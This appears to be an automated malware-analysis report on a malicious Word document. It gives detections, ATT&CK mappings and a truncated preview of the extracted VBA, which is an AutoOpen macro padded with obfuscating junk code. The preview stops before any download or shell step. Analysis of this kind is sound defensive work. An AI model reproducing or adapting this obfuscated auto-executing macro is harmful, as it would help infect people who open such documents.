MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and uses the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection also confirms its malicious nature.
Heuristics 7
-
ClamAV: Doc.Macro.Obfuscation-6331107-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6331107-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 81460 bytes |
SHA-256: 701d05bd7a119284f0fe6385008440231624518c647c4a75c6ee20d22ecbe1da |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "BfHZCs" Sub AutoOpen() uAQtaWmBy = -614 + 636 Select Case uAQtaWmBy Case 9810 / 1635 jPjhTZgnA = 168 Case 495 - 476 uZ62IkbG = True Case 47 + 7 uT0s7 = True Case Else pb3RcK = 168 End Select KnMjP = -614 + 636 Select Case KnMjP Case 9810 / 1635 lQxynO = 34094.395339746 Case 495 - 476 m92MkeSq = True End Select vQogye = 187 + 80 If vQogye = 9810 / 1635 Then RksGDv = FH6D08lJs Else fkpRq = 34199.26947475 End If rV3cM = RksGDv & fkpRq KrdR9JU = 19110 / 455 Select Case KrdR9JU Case 10145 - 10142 ExGHD = True Case -740 + 771 zBaSd4eWj = 27778 Case 670 - 630 w7XpF = 96 Case Else Z9NOuSZl = 60228.635483252 End Select i1LJfPT = 19110 / 455 Select Case i1LJfPT Case 10145 - 10142 T6DUbd1 = 48883.568023761 Case -740 + 771 kY7NR = 48883.568023761 Case 670 - 630 u9WXRC = 255 Case Else DKDyY3RI = iGFsaT End Select YeR5U = 19110 / 455 Select Case YeR5U Case 10145 - 10142 wLIhT64 = 6842 Case -740 + 771 XpzGmo = 42881.492484296 Case 670 - 630 sibNl = 36 End Select Plq8RoV7j = 121 - 49 Select Case Plq8RoV7j Case -3169 + 3172 ITn8lLOQA = -356693444 Case 25978 / 838 dhSfz = -27741 Case -627 + 662 b4RZH = True End Select iNXRl = 121 - 49 Select Case iNXRl Case -3169 + 3172 rRClidUO = 130 End Select Ow3VTF9M = 121 - 49 Select Case Ow3VTF9M Case -3169 + 3172 YOPCL1BAZ = 42064.041526093 Case 25978 / 838 l6UyW7bR = 48755.761437766 Case -627 + 662 ydKgD = 74 End Select jw7UyW = 8 + 71 Select Case jw7UyW Case -2808 + 2810 USgqB8s = False End Select GO4WCu1 = 742 + 22 If GO4WCu1 = -2808 + 2810 Then jewZI1jlN = 26446 End If cJh97By = cJh97By & jewZI1jlN weLMKtIER = 8 + 71 Select Case weLMKtIER Case -2808 + 2810 yVQMLYTp0 = 170 Case -784 + 800 amRY2JX = 170 End Select L94gJQP = 742 + 22 If L94gJQP = -2808 + 2810 Then ueOG6Eb3 = -1694749206 End If kMjp6 = kMjp6 & ueOG6Eb3 USiqsDwl = 8 + 71 Select Case USiqsDwl Case -2808 + 2810 vinaej = 18560.181849477 Case -784 + 800 ncOBj0 = False Case 259 - 204 Ie26PiM = 5582.1076778674 Case Else BIpb94y = N3xDpQ End Select B3a597krJ = 256 - 136 Select Case B3a597krJ Case -768 + 782 DnXfNGbV = True Case 12863 / 677 yboTcIYg = pONyg9aZ Case 1 + 50 tY4Tc = 13370 Case Else jj7XZdcOF = 32984.985876926 End Select Q6QcSChto = 583 + 16 If Q6QcSChto = -768 + 782 Then ulwxK = 0 ElseIf Q6QcSChto = 12863 / 677 Then IGbiSrLTa = 21138.122868529 Else evhfIWpx = 8819 End If DMQvtuHxc = ulwxK & IGbiSrLTa & evhfIWpx ZQmOdK = 256 - 136 Select Case ZQmOdK Case -768 + 782 VuXzI = True End Select MT7496 = 256 - 136 Select Case MT7496 Case -768 + 782 eRrfYt = 238 Case 12863 / 677 kGjue7DY = 238 Case 1 + 50 ucMxeF = 1231.5808959735 Case Else qmxTdn = 61321.781155712 End Select s19n4L = 21 + 78 Select Case s19n4L Case 2177 - 2165 kuvBG9 = -362286442 Case 27 - 5 WEkbVqf = -362286442 Case 14792 / 344 BnPT9p = 22744 End Select b24UtF = 1023 * 1 If b24UtF = 2177 - 2165 Then xWJuCEf = 43606.160584505 ElseIf b24UtF = 27 - 5 Then RntXe2q3 = 0 Else uV7Wmh3BS = arh8M0 End If JXMGWpm8 = xWJuCEf & RntXe2q3 & uV7Wmh3BS wQtExu = 21 + 78 Select Case wQtExu Case 2177 - 2165 rY1FT6P = 28922 Case 27 - 5 eMc3f = 22041.119276654 Case 14792 / 344 mZO8CPR = CpMS5Puy Case Else h8JkG7olh = 22041.119276654 End Select FLXm27G = 969 - 6 If FLXm27G = 2292 - 2285 Then qCxkB9nbw = True ElseIf FLXm27G = 29203 / 1007 Then FIy4FE = 43902.6955575 Else bufEymHI = AIjLhzwrt End If U8QaR = qCxkB9nbw & FIy4FE & bufEymHI jPyI8 = 969 - 6 If jPyI8 = 2292 - 2285 Then VsgxAwSJq = 64072.017432483 ElseIf jPyI8 = 29203 / 1007 Then fjiUEv = 64072.017432483 Else qjI3a = DzGMsecW End If zwzgjAe = VsgxAwSJq & fjiUEv & qjI3a wIVFqrW = 969 - 6 If wIVFqrW = 2292 - 2285 Then BTdO7 = -270 ElseI ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.